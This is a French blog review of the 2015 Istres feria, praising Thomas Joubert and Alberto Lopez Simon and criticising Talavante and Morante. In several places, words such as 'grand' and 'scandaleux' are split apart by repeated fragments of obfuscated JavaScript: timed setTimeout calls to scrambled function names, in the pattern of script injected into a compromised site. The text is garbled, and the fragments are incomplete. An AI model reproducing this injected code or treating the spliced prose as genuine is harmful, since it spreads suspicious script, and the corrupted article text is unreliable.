ISTRES 2015 GRAINES DE STARS

Le principal enseignement de cette feria de 4 corridas en 3 jours est qu’il y a tout lieu d’espérer de jeunes toreros peu connus (souvent barr2s par les stars peu partageuses) mais sachant saisir avec culot les occasions qui finissent par se présenter. Nous avons découvert samedi Thomas Joubert, Tomasito au début de sa carrière, seulement 2 corridas au compteur en 2014. Sa sereine élégance séduisit le public et la faena variée, sincère et conclue au premier essai d’une lame un peu basse, fut primée de 2 oreilles amplement méritées.

Gageons que le futur de Thomas Joubert le mènera en haut de l’escalafon français.
Au rayon découverte et confirmation,  avec un début de saison tonitruant, il faut ranger Alberto Lopez Simon (4 oreilles en 2 corridas à Madrid). Ce dimanche, alternant avec Ponce et Talavante en remplacement de Manzanares, il donna un véritable récital de tauromachie.

Première faena magnifique, variée, dans le terrain du toro avec un début par derechazos de face puis une variété de passes des deux mains où verticalitė et temple mirent les gradins debout. Entrant droit, il coupa 2 oreilles incontestables. Le récital se poursuivit avec « Zarandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando », le 6e d'un bon lot de Zalduendo qui dans une faena a mas fut un partenaire idéal permettant au jeune torero de multiplier les séries pendant qu'une pétition montante d'indulto devint a ce point assourdissante que le président finit par sortir le mouchoir orange, apothéose du triomphe de ce Lopez Simon promis à un grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and avenir.
Le futur nous dira s’il est le grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and torero que le mundillo attend !

Pour le reste saluons le professionnalisme de Ponce, Bautista et El Juli 1, 3 et 3 oreilles mais sans surprises, et signalons le comportement scandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andaleux de Talavante et Morante aux abonnés absents et sortant sous des broncas entendues jusqu'à Saint Malo. Musique de haut vol par la Peña "chicuelo II".

Les commentaires sont fermés.